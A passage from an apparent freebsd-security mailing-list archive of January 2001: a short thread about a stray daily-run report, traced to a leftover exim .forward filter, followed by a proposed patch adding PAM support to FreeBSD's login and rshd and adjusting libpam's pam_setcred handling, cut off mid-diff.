> xl0 1500 will.never.be will.never.be 49045770 0 84287087 4 0 > xl0 1500 vanitywhore.o vanitywhore.org 49045770 0 84287087 4 0 > xl0 1500 is.a.masturba is.a.masturbati 49045770 0 84287087 4 0 > xl0 1500 works.for.ver works.for.versa 49045770 0 84287087 4 0 > xl0 1500 deeply.shallo deeply.shallow. 49045770 0 84287087 4 0 > xl0 1500 62.58.48.84/3 62.58.48.84 49045770 0 84287087 4 0 > lo0 16384 5114 0 5114 0 0 > lo0 16384 127 localhost 5114 0 5114 0 0 > > Local system status: > 3:01AM up 15:55, 1 user, load averages: 0.00, 0.00, 0.00 > > Mail in local queue: > Mail queue is empty > > Security check: > (output mailed separately) > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Laurence Berland Intern, Flooz.com Northwestern '04 stuyman@confusion.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 19:54:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from stage1.thirdage.com (stage1.thirdage.com [4.18.197.236]) by hub.freebsd.org (Postfix) with ESMTP id 4486837B400 for ; Mon, 22 Jan 2001 19:53:56 -0800 (PST) Received: from rubbish.thirdage.com (morphologue.thirdage.com [4.18.197.67]) by stage1.thirdage.com (8.9.1/8.9.1) with ESMTP id TAA28899; Mon, 22 Jan 2001 19:56:46 -0800 (PST) Message-Id: <5.0.2.1.2.20010122195406.077e66d0@mail.thirdage.com> X-Sender: jal@mail.thirdage.com X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Mon, 22 Jan 2001 19:55:05 -0800 To: Laurence Berland , security@FreeBSD.ORG From: Jamie Lawrence Subject: Re: kyra.unloved.org daily run output In-Reply-To: <3A6CFB44.7CCD8D88@euphoria.confusion.net> References: <20010123020607.7E839F40E@kyra.unloved.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:32 PM 1/22/01 -0600, Laurence Berland wrote: >What do we make of this? That someone has extremely interesting DNS entries? -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 20:41: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id E35B037B404 for ; Mon, 22 Jan 2001 20:40:50 -0800 (PST) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id XAA16327; Mon, 22 Jan 2001 23:39:06 -0500 Message-ID: <3A6D0AB9.E5D956C9@allmaui.com> Date: Mon, 22 Jan 2001 20:38:17 -0800 From: Craig Cowen X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Jamie Lawrence Cc: Laurence Berland , security@FreeBSD.ORG Subject: Re: kyra.unloved.org daily run output References: <20010123020607.7E839F40E@kyra.unloved.org> <5.0.2.1.2.20010122195406.077e66d0@mail.thirdage.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org And a 3com card Jamie Lawrence wrote: > At 09:32 PM 1/22/01 -0600, Laurence Berland wrote: > >What do we make of this? > > That someone has extremely interesting DNS entries? > > -j > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 20:52:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 476FC37B401 for ; Mon, 22 Jan 2001 20:52:28 -0800 (PST) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id XAA23672; Mon, 22 Jan 2001 23:52:25 -0500 Message-ID: <3A6D0DD8.DA886CE4@allmaui.com> Date: Mon, 22 Jan 2001 20:51:36 -0800 From: Craig Cowen X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Jamie Lawrence , security@FreeBSD.ORG Subject: Re: kyra.unloved.org daily run output References: <20010123020607.7E839F40E@kyra.unloved.org> <5.0.2.1.2.20010122195406.077e66d0@mail.thirdage.com> <3A6D0AB9.E5D956C9@allmaui.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We know he/she/it doesn't have a clue Craig Cowen wrote: > And a 3com card > > Jamie Lawrence wrote: > > > At 09:32 PM 1/22/01 -0600, Laurence Berland wrote: > > >What do we make of this? > > > > That someone has extremely interesting DNS entries? > > > > -j > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 21:17:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id D051B37B401 for ; Mon, 22 Jan 2001 21:17:28 -0800 (PST) Received: from fpsn.net (control.fpsn.net [63.224.69.60]) by mail.fpsn.net (8.9.3/8.9.3) with ESMTP id WAA56531 for ; Mon, 22 Jan 2001 22:17:18 -0700 (MST) (envelope-from cfaber@fpsn.net) Message-ID: <3A6D1354.5A0B4CFB@fpsn.net> Date: Mon, 22 Jan 2001 22:15:00 -0700 From: Colin Faber Reply-To: cfaber@fpsn.net Organization: fpsn.net, Inc. X-Mailer: Mozilla 4.75 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: kyra.unloved.org daily run output References: <20010123020607.7E839F40E@kyra.unloved.org> <5.0.2.1.2.20010122195406.077e66d0@mail.thirdage.com> <3A6D0AB9.E5D956C9@allmaui.com> <3A6D0DD8.DA886CE4@allmaui.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Don't forget proper backups Craig Cowen wrote: > We know he/she/it doesn't have a clue > > Craig Cowen wrote: > > > And a 3com card > > > > Jamie Lawrence wrote: > > > > > At 09:32 PM 1/22/01 -0600, Laurence Berland wrote: > > > >What do we make of this? > > > > > > That someone has extremely interesting DNS entries? > > > > > > -j > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 1:47: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from daphne.unloved.org (unknown [62.58.62.165]) by hub.freebsd.org (Postfix) with ESMTP id 5C54237B402 for ; Tue, 23 Jan 2001 01:46:47 -0800 (PST) Received: by daphne.unloved.org (Postfix, from userid 1001) id 7D1B611727; Tue, 23 Jan 2001 10:46:53 +0100 (CET) Date: Tue, 23 Jan 2001 10:46:53 +0100 From: Ashley Penney To: Laurence Berland Cc: freebsd-security@FreeBSD.ORG Subject: Re: kyra.unloved.org daily run output Message-ID: <20010123104653.A7601@daphne.unloved.org> References: <20010123020607.7E839F40E@kyra.unloved.org> <3A6CFB44.7CCD8D88@euphoria.confusion.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A6CFB44.7CCD8D88@euphoria.confusion.net>; from stuyman@euphoria.confusion.net on Mon, Jan 22, 2001 at 09:32:20PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 22, 2001 at 09:32:20PM -0600, Laurence Berland said: > What do we make of this? I'm an idiot? :) I moved from exim to postfix, and left behind an old exim filtering .forward, exim uses this bizarre .forward syntax to filter. However, if you change to a different MTA, it happily emails everything it find between the perl syntax, doing stupidities like this. I've had so much hate mail. :) -- "Go to Heaven for the climate, Hell for the company." -- Mark Twain To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 10:40:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from catapult.web.us.uu.net (catapult.web.us.uu.net [208.211.134.20]) by hub.freebsd.org (Postfix) with ESMTP id 2997D37B402 for ; Tue, 23 Jan 2001 10:40:00 -0800 (PST) Received: from catapult.web.us.uu.net (localhost.web.us.uu.net [127.0.0.1]) by catapult.web.us.uu.net (Postfix) with ESMTP id 4A4C83E5B; Tue, 23 Jan 2001 13:39:44 -0500 (EST) To: "Jacques A. Vidrine" , "David J. MacKenzie" , freebsd-security@freebsd.org Subject: Re: Fwd: [PAM broken design? pam_setcred] In-Reply-To: Message from "Jacques A. Vidrine" of "Mon, 22 Jan 2001 08:54:59 CST." <20010122085459.A93103@hamlet.nectar.com> Date: Tue, 23 Jan 2001 13:39:44 -0500 From: "David J. MacKenzie" Message-Id: <20010123183944.4A4C83E5B@catapult.web.us.uu.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I forwarded your example to the Linux-PAM maintainters, and got back a reply favoring the approach you intuitively expect; to save the pam_sm_authenticate() results and call the same modules' pam_sm_setcred() functions. The bug report is in the tracking system at: http://sourceforge.net/bugs/?func=detailbug&bug_id=129775&group_id=6663 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 10:47: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from jenkins.web.us.uu.net (jenkins.web.us.uu.net [208.240.88.32]) by hub.freebsd.org (Postfix) with ESMTP id CE1AF37B699 for ; Tue, 23 Jan 2001 10:46:18 -0800 (PST) Received: from dagger.web.us.uu.net (dagger.web.us.uu.net [208.211.134.28]) by jenkins.web.us.uu.net (Postfix) with ESMTP id 7455C12686; Tue, 23 Jan 2001 13:46:17 -0500 (EST) Received: by dagger.web.us.uu.net (Postfix, from userid 515) id E675046C7; Tue, 23 Jan 2001 13:46:11 -0500 (EST) From: "David J. MacKenzie" To: freebsd-security@freebsd.org Cc: djm@web.us.uu.net Subject: PAM patches, iteration 4 X-Tom-Swiftie: "I've finished counting the horses," Tom said summarily Message-Id: <20010123184611.E675046C7@dagger.web.us.uu.net> Date: Tue, 23 Jan 2001 13:46:11 -0500 (EST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've updated the docs to reflect PAM, cleaned up some error handling, and included my patch to work around the pam_setcred() dispatch problem. I also removed the non-logincap code path from su and rshd, since it's already mandatory in login. As before, this replaces my earlier patches. I'd welcome having PAM experts examine them closely. I think they're ready for a wider audience. --- ./contrib/libpam/doc/man/pam_setcred.3 1998/11/18 01:20:54 1.1 +++ ./contrib/libpam/doc/man/pam_setcred.3 2001/01/23 01:24:58 @@ -16,7 +16,7 @@ This function is used to establish, maintain and delete the credentials of a user. It should be called after a user has been -authenticated and before a session is opened for the user (with +authenticated and after a session is opened for the user (with .BR pam_open_session "(3))." It should be noted that credentials come in many forms. Examples @@ -29,6 +29,23 @@ .BR initgroups "(2) " (or equivalent) should have been performed. +This function runs the +.BI pam_sm_setcred() +functions for all +.BR auth +modules defined for the current PAM service, even if a control flag +of +.BR sufficient +or +.BR requisite +is present. This is to ensure that a module whose +.BI pam_sm_setcred() +function returns +.BR PAM_SUCCESS +even if that module did not succeed in +.BI pam_authenticate() +does not prevent modules listed later from setting their credentials. +It also appears to be the behavior of Solaris PAM. .SH "VALID FLAGS" .TP .BR PAM_ESTABLISH_CRED --- ./contrib/libpam/libpam/pam_handlers.c 2001/01/22 20:19:52 1.1 +++ ./contrib/libpam/libpam/pam_handlers.c 2001/01/22 20:22:44 @@ -500,6 +500,8 @@ #endif char *mod_full_path=NULL; servicefn func, func2; + int actions2buf[_PAM_RETURN_VALUES]; + int *actions2 = actions; int success; D(("called.")); @@ -649,6 +651,19 @@ _sym = "_pam_sm_authenticate"; _sym2 = "_pam_sm_setcred"; #endif + actions2 = actions2buf; + /* Always run the pam_sm_setcred for all listed auth modules. + Otherwise, we can end up not running the pam_sm_setcred + for auth module(s) that authenticated successfully, + e.g. if an earlier auth module is "sufficient" and + its authenticate fails but its setcred succeeds. + This is also apparently what Solaris PAM does. */ + { + int i; + for (i = 0; i < _PAM_RETURN_VALUES; i++) + actions2[i] = _PAM_ACTION_IGNORE; + actions2[PAM_SUCCESS] = _PAM_ACTION_OK; + } break; case PAM_T_SESS: handler_p = &the_handlers->open_session; @@ -780,7 +795,7 @@ (*handler_p2)->must_fail = must_fail; /* failure forced? */ (*handler_p2)->func = func2; - memcpy((*handler_p2)->actions,actions,sizeof((*handler_p2)->actions)); + memcpy((*handler_p2)->actions,actions2,sizeof((*handler_p2)->actions)); (*handler_p2)->argc = argc; if (argv) { if (((*handler_p2)->argv = malloc(argvlen)) == NULL) { --- ./libexec/rshd/Makefile 2001/01/17 00:04:57 1.1 +++ ./libexec/rshd/Makefile 2001/01/23 18:03:41 @@ -7,10 +7,15 @@ #CFLAGS+= -DCRYPT -# For login_cap handling -CFLAGS+=-DLOGIN_CAP -Wall +CFLAGS+= -Wall DPADD+= ${LIBUTIL} LDADD+= -lutil + +.if !defined(NOPAM) +CFLAGS+= -DUSE_PAM +DPADD+= ${LIBPAM} +LDADD+= ${MINUSLPAM} +.endif # IPv6 support CFLAGS+= -DINET6 --- ./libexec/rshd/rshd.8 2001/01/23 01:05:26 1.1 +++ ./libexec/rshd/rshd.8 2001/01/23 01:16:21 @@ -238,6 +238,16 @@ .It Pa Ev $HOME /.rhosts .Sm on .It Pa /var/run/nologin +.It Pa /etc/pam.conf +if +.Nm +is configured with PAM support, it uses +.Pa /etc/pam.conf +entries with service name +.Dq rsh . +authentication modules requiring passwords (such as +.Nm pam_unix ) +are not supported .El .Sh BUGS The authentication procedure used here assumes the integrity --- ./libexec/rshd/rshd.c 2000/11/12 07:00:38 1.1 +++ ./libexec/rshd/rshd.c 2001/01/23 18:01:58 @@ -76,9 +76,21 @@ #include #include #include -#ifdef LOGIN_CAP #include -#endif + +#ifdef USE_PAM +#include +#include +static pam_handle_t *pamh; +#define PAM_END { \ + if ((retcode = pam_setcred(pamh, PAM_DELETE_CRED)) != PAM_SUCCESS) \ + syslog(LOG_ERR|LOG_AUTH, "pam_setcred: %s", pam_strerror(pamh, retcode)); \ + if ((retcode = pam_close_session(pamh,0)) != PAM_SUCCESS) \ + syslog(LOG_ERR|LOG_AUTH, "pam_close_session: %s", pam_strerror(pamh, retcode)); \ + if ((retcode = pam_end(pamh, retcode)) != PAM_SUCCESS) \ + syslog(LOG_ERR|LOG_AUTH, "pam_end: %s", pam_strerror(pamh, retcode)); \ +} +#endif /* USE_PAM */ /* wrapper for KAME-special getnameinfo() */ #ifndef NI_WITHSCOPEID @@ -188,6 +200,20 @@ return(0); } +#ifdef USE_PAM +/* + * We can't have a conversation with the client over the rsh connection. + * You must use auth methods that don't require one, like pam_rhosts. + */ + +int null_conv(int num_msg, const struct pam_message **msg, + struct pam_response **resp, void *appdata_ptr) +{ + syslog(LOG_ERR, "PAM conversation is not supported"); + return PAM_CONV_ERR; +} +#endif /* USE_PAM */ + char username[20] = "USER="; char homedir[64] = "HOME="; char shell[64] = "SHELL="; @@ -216,9 +242,12 @@ int rc; int pv1[2], pv2[2]; #endif -#ifdef LOGIN_CAP login_cap_t *lc; -#endif +#ifdef USE_PAM + static struct pam_conv conv = { null_conv, NULL }; + int retcode, i; + const char * const *env; +#endif /* USE_PAM */ (void) signal(SIGINT, SIG_DFL); (void) signal(SIGQUIT, SIG_DFL); @@ -229,7 +258,7 @@ && af != AF_INET6 #endif ) { - syslog(LOG_ERR, "malformed \"from\" address (af %d)\n", af); + syslog(LOG_ERR, "malformed \"from\" address (af %d)", af); exit(1); } err = getnameinfo((struct sockaddr *)fromp, fromp->su_len, numericname, @@ -341,6 +370,56 @@ getstr(locuser, sizeof(locuser), "locuser"); getstr(cmdbuf, sizeof(cmdbuf), "command"); + +#ifdef USE_PAM + retcode = pam_start("rsh", locuser, &conv, &pamh); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR|LOG_AUTH, "pam_start: %s", pam_strerror(pamh, retcode)); + error("Login incorrect.\n"); + exit(1); + } + + retcode = pam_set_item (pamh, PAM_RUSER, remuser); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_RUSER): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + error("Login incorrect.\n"); + exit(1); + } + retcode = pam_set_item (pamh, PAM_RHOST, fromhost); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + error("Login incorrect.\n"); + exit(1); + } + retcode = pam_set_item (pamh, PAM_TTY, "tty"); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + error("Login incorrect.\n"); + exit(1); + } + + retcode = pam_authenticate(pamh, 0); + if (retcode == PAM_SUCCESS) { + if ((retcode = pam_get_item(pamh, PAM_USER, (const void **) &cp)) == PAM_SUCCESS) { + strncpy(locuser, cp, sizeof(locuser)); + locuser[sizeof(locuser) - 1] = '\0'; + } else + syslog(LOG_ERR|LOG_AUTH, "pam_get_item(PAM_USER): %s", + pam_strerror(pamh, retcode)); + retcode = pam_acct_mgmt(pamh, 0); + } + if (retcode != PAM_SUCCESS) { + syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied (%s). cmd='%.80s'", + remuser, fromhost, locuser, pam_strerror(pamh, retcode), cmdbuf); + pam_end(pamh, retcode); + error("Login incorrect.\n"); + exit(1); + } +#endif /* USE_PAM */ + setpwent(); pwd = getpwnam(locuser); if (pwd == NULL) { @@ -349,13 +428,36 @@ remuser, fromhost, locuser, cmdbuf); if (errorstr == NULL) errorstr = "Login incorrect.\n"; - goto fail; + error(errorstr, fromhost); + exit(1); + } + +#ifndef USE_PAM + if (errorstr || + (pwd->pw_expire && time(NULL) >= pwd->pw_expire) || + iruserok_sa(fromp, fromp->su_len, pwd->pw_uid == 0, + remuser, locuser) < 0) { + if (__rcmd_errstr) + syslog(LOG_INFO|LOG_AUTH, + "%s@%s as %s: permission denied (%s). cmd='%.80s'", + remuser, fromhost, locuser, __rcmd_errstr, + cmdbuf); + else + syslog(LOG_INFO|LOG_AUTH, + "%s@%s as %s: permission denied. cmd='%.80s'", + remuser, fromhost, locuser, cmdbuf); + if (errorstr == NULL) + errorstr = "Login incorrect.\n"; + error(errorstr, fromhost); + exit(1); } -#ifdef LOGIN_CAP +#endif /* USE_PAM */ + lc = login_getpwclass(pwd); -#endif + if (pwd->pw_uid) + auth_checknologin(lc); + if (chdir(pwd->pw_dir) < 0) { -#ifdef LOGIN_CAP if (chdir("/") < 0 || login_getcapbool(lc, "requirehome", !!pwd->pw_uid)) { syslog(LOG_INFO|LOG_AUTH, @@ -364,44 +466,9 @@ error("No remote home directory.\n"); exit(0); } -#else - (void) chdir("/"); -#ifdef notdef - syslog(LOG_INFO|LOG_AUTH, - "%s@%s as %s: no home directory. cmd='%.80s'", - remuser, fromhost, locuser, cmdbuf); - error("No remote directory.\n"); - exit(1); -#endif -#endif pwd->pw_dir = "/"; } - if (errorstr || - (pwd->pw_expire && time(NULL) >= pwd->pw_expire) || - iruserok_sa(fromp, fromp->su_len, pwd->pw_uid == 0, - remuser, locuser) < 0) { - if (__rcmd_errstr) - syslog(LOG_INFO|LOG_AUTH, - "%s@%s as %s: permission denied (%s). cmd='%.80s'", - remuser, fromhost, locuser, __rcmd_errstr, - cmdbuf); - else - syslog(LOG_INFO|LOG_AUTH, - "%s@%s as %s: permission denied. cmd='%.80s'", - remuser, fromhost, locuser, cmdbuf); -fail: - if (errorstr == NULL) - errorstr = "Login incorrect.\n"; - error(errorstr, fromhost); - exit(1); - } - - if (pwd->pw_uid && !access(_PATH_NOLOGIN, F_OK)) { - error("Logins currently disabled.\n"); - exit(1); - } -#ifdef LOGIN_CAP if (lc != NULL && fromp->su_family == AF_INET) { /*XXX*/ char remote_ip[MAXHOSTNAMELEN]; @@ -421,13 +488,30 @@ exit(1); } } -#endif /* !LOGIN_CAP */ #if BSD > 43 /* before fork, while we're session leader */ if (setlogin(pwd->pw_name) < 0) syslog(LOG_ERR, "setlogin() failed: %m"); #endif + /* + * PAM modules might add supplementary groups in + * pam_setcred(), so initialize them first. + * But we need to open the session as root. + */ + if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETGROUP) != 0) { + syslog(LOG_ERR, "setusercontext: %m"); + exit(1); + } + +#ifdef USE_PAM + if ((retcode = pam_open_session(pamh, 0)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_open_session: %s", pam_strerror(pamh, retcode)); + } else if ((retcode = pam_setcred(pamh, PAM_ESTABLISH_CRED)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, retcode)); + } +#endif /* USE_PAM */ + (void) write(STDERR_FILENO, "\0", 1); sent_null = 1; @@ -451,6 +535,9 @@ pid = fork(); if (pid == -1) { error("Can't fork; try again.\n"); +#ifdef USE_PAM + PAM_END; +#endif /* USE_PAM */ exit(1); } if (pid) { @@ -569,6 +656,9 @@ (doencrypt && FD_ISSET(pv1[0], &readfrom)) || #endif FD_ISSET(pv[0], &readfrom)); +#ifdef USE_PAM + PAM_END; +#endif /* USE_PAM */ exit(0); } setpgrp(0, getpid()); @@ -586,6 +676,23 @@ dup2(pv[1], 2); close(pv[1]); } +#ifdef USE_PAM + else { + pid = fork(); + if (pid == -1) { + error("Can't fork; try again.\n"); + PAM_END; + exit(1); + } + if (pid) { + /* Parent. */ + wait(NULL); + PAM_END; + exit(0); + } + } +#endif /* USE_PAM */ + if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL; environ = envinit; @@ -598,17 +705,20 @@ cp++; else cp = pwd->pw_shell; -#ifdef LOGIN_CAP - if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETALL) != 0) { + + if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETALL & ~LOGIN_SETGROUP) != 0) { syslog(LOG_ERR, "setusercontext: %m"); exit(1); } login_close(lc); -#else - (void) setgid((gid_t)pwd->pw_gid); - initgroups(pwd->pw_name, pwd->pw_gid); - (void) setuid((uid_t)pwd->pw_uid); -#endif +#ifdef USE_PAM + env = (const char * const *)pam_getenvlist(pamh); + if (env != NULL) { + for (i=0; env[i]; i++) + putenv(env[i]); + } +#endif /* USE_PAM */ + endpwent(); if (log_success || pwd->pw_uid == 0) { syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: cmd='%.80s'", --- ./usr.bin/login/Makefile 2001/01/21 04:44:21 1.1 +++ ./usr.bin/login/Makefile 2001/01/21 04:44:45 @@ -11,9 +11,8 @@ DPADD= ${LIBUTIL} ${LIBCRYPT} LDADD= -lutil -lcrypt -.if defined(NOPAM) -CFLAGS+= -DNO_PAM -.else +.if !defined(NOPAM) +CFLAGS+= -DUSE_PAM DPADD+= ${LIBPAM} LDADD+= ${MINUSLPAM} .endif --- ./usr.bin/login/login.1 2001/01/23 01:04:52 1.1 +++ ./usr.bin/login/login.1 2001/01/23 01:16:45 @@ -177,6 +177,13 @@ makes login quieter .It Pa /etc/auth.conf configure authentication services +.It Pa /etc/pam.conf +if +.Nm +is configured with PAM support, it uses +.Pa /etc/pam.conf +entries with service name +.Dq login .El .Sh SEE ALSO .Xr builtin 1 , --- ./usr.bin/login/login.c 2000/08/08 03:12:59 1.1 +++ ./usr.bin/login/login.c 2001/01/23 00:53:51 @@ -78,10 +78,11 @@ #include #include -#ifndef NO_PAM +#ifdef USE_PAM #include #include -#endif +#include +#endif /* USE_PAM */ #include "pathnames.h" @@ -104,9 +105,18 @@ int login_access __P((char *, char *)); void login_fbtab __P((char *, uid_t, gid_t)); -#ifndef NO_PAM +#ifdef USE_PAM static int auth_pam __P((void)); -#endif +pam_handle_t *pamh = NULL; +#define PAM_END { \ + if ((e = pam_setcred(pamh, PAM_DELETE_CRED)) != PAM_SUCCESS) \ + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, e)); \ + if ((e = pam_close_session(pamh,0)) != PAM_SUCCESS) \ + syslog(LOG_ERR, "pam_close_session: %s", pam_strerror(pamh, e)); \ + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) \ + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); \ +} +#endif /* USE_PAM */ static int auth_traditional __P((void)); extern void login __P((struct utmp *)); static void usage __P((void)); @@ -150,6 +160,10 @@ char tname[sizeof(_PATH_TTY) + 10]; char *shell = NULL; login_cap_t *lc = NULL; +#ifdef USE_PAM + pid_t pid; + int e; +#endif /* USE_PAM */ (void)signal(SIGQUIT, SIG_IGN); (void)signal(SIGINT, SIG_IGN); @@ -309,19 +323,19 @@ (void)setpriority(PRIO_PROCESS, 0, -4); -#ifndef NO_PAM +#ifdef USE_PAM /* * Try to authenticate using PAM. If a PAM system error * occurs, perhaps because of a botched configuration, * then fall back to using traditional Unix authentication. */ if ((rval = auth_pam()) == -1) -#endif /* NO_PAM */ +#endif /* USE_PAM */ rval = auth_traditional(); (void)setpriority(PRIO_PROCESS, 0, 0); -#ifndef NO_PAM +#ifdef USE_PAM /* * PAM authentication may have changed "pwd" to the * entry for the template user. Check again to see if @@ -329,7 +343,7 @@ */ if (pwd != NULL && pwd->pw_uid == 0) rootlogin = 1; -#endif /* NO_PAM */ +#endif /* USE_PAM */ ttycheck: /* @@ -549,6 +563,43 @@ environ = envinit; /* + * PAM modules might add supplementary groups during pam_setcred(). + */ + if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETGROUP) != 0) { + syslog(LOG_ERR, "setusercontext() failed - exiting"); + exit(1); + } + +#ifdef USE_PAM + if (pamh) { + if ((e = pam_open_session(pamh, 0)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_open_session: %s", pam_strerror(pamh, e)); + } else if ((e = pam_setcred(pamh, PAM_ESTABLISH_CRED)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, e)); + } + + /* + * We must fork() before setuid() because we need to call + * pam_close_session() as root. + */ + pid = fork(); + if (pid < 0) { + err(1, "fork"); + PAM_END; + exit(0); + } else if (pid) { + /* parent - wait for child to finish, then cleanup session */ + wait(NULL); + PAM_END; + exit(0); + } else { + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); + } + } +#endif /* USE_PAM */ + + /* * We don't need to be root anymore, so * set the user and session context */ @@ -557,7 +608,7 @@ exit(1); } if (setusercontext(lc, pwd, pwd->pw_uid, - LOGIN_SETALL & ~LOGIN_SETLOGIN) != 0) { + LOGIN_SETALL & ~(LOGIN_SETLOGIN|LOGIN_SETGROUP)) != 0) { syslog(LOG_ERR, "setusercontext() failed - exiting"); exit(1); } @@ -573,6 +624,17 @@ (void)setenv("USER", username, 1); (void)setenv("PATH", rootlogin ? _PATH_STDPATH : _PATH_DEFPATH, 0); +#ifdef USE_PAM + if (pamh) { + const char * const *env = (const char * const *)pam_getenvlist(pamh); + int i; + if (env != NULL) { + for (i=0; env[i]; i++) + putenv(env[i]); + } + } +#endif /* USE_PAM */ + if (!quietlog) { char *cw; @@ -652,7 +714,7 @@ return rval; } -#ifndef NO_PAM +#ifdef USE_PAM /* * Attempt to authenticate the user using PAM. Returns 0 if the user is * authenticated, or 1 if not authenticated. If some sort of PAM system @@ -663,7 +725,6 @@ static int auth_pam() { - pam_handle_t *pamh = NULL; const char *tmpl_user; const void *item; int rval; @@ -677,12 +738,14 @@ if ((e = pam_set_item(pamh, PAM_TTY, tty)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, e)); + pam_end(pamh, e); return -1; } if (hostname != NULL && (e = pam_set_item(pamh, PAM_RHOST, full_hostname)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, e)); + pam_end(pamh, e); return -1; } e = pam_authenticate(pamh, 0); @@ -712,8 +775,8 @@ if (strcmp(username, tmpl_user) != 0) pwd = getpwnam(tmpl_user); } else - syslog(LOG_ERR, "Couldn't get PAM_USER: %s", - pam_strerror(pamh, e)); + syslog(LOG_ERR, "pam_get_item(PAM_USER): %s", + pam_strerror(pamh, e)); rval = 0; break; @@ -724,17 +787,33 @@ break; default: - syslog(LOG_ERR, "auth_pam: %s", pam_strerror(pamh, e)); + syslog(LOG_ERR, "pam_authenticate: %s", pam_strerror(pamh, e)); rval = -1; break; } - if ((e = pam_end(pamh, e)) != 